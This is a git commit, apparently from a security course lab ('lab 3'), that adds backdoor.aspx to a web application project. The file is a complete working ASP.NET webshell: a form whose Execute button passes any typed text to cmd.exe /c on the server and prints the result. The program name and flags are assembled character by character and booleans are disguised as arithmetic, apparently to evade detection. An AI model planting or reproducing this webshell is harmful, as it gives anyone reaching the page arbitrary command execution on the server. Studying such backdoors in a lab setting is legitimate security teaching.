lab 3

2022-02-23 14:05:00 +01:00
parent 9df42871ff
commit ce326eab27
70 changed files with 17205 additions and 1 deletions
--- a/lab3/cs_lab3/myWebApplication/Demo/backdoor.aspx
+++ b/lab3/cs_lab3/myWebApplication/Demo/backdoor.aspx
@ -0,0 +1,47 @@
+<%@ Page Language="C#" Debug="true" Trace="false" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.IO" %>
+<script Language="c#" runat="server">
+void Page_Load(object sender, EventArgs e)
+{
+}
+string doRunCmd(string arg)
+{
+ProcessStartInfo psi = new ProcessStartInfo();
+psi.FileName  = "c";
+psi.FileName += "m";
+psi.FileName += "d";
+psi.FileName += ".";
+psi.FileName += "e";
+psi.FileName += "x";
+psi.FileName += "e";
+psi.Arguments  = "/";
+psi.Arguments += "c";
+psi.Arguments += arg;
+psi.RedirectStandardOutput = (2 + 3 == 5);
+psi.UseShellExecute = (1 + 2 == 4);
+Process p = Process.Start(psi);
+StreamReader stmrdr = p.StandardOutput;
+string s = stmrdr.ReadToEnd();
+stmrdr.Close();
+return s;
+}
+void cmdrun_Click(object sender, System.EventArgs e)
+{
+Response.Write("<pre>");
+Response.Write(Server.HtmlEncode(doRunCmd(txtArg.Text)));
+Response.Write("</pre>");
+}
+</script>
+<HTML>
+<HEAD>
+<title>asp.net webshell</title>
+</HEAD>
+<body >
+<form id="cmd" method="post" runat="server">
+<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
+<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="Execute" OnClick="cmdrun_Click"></asp:Button>
+<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
+</form>
+</body>
+</HTML>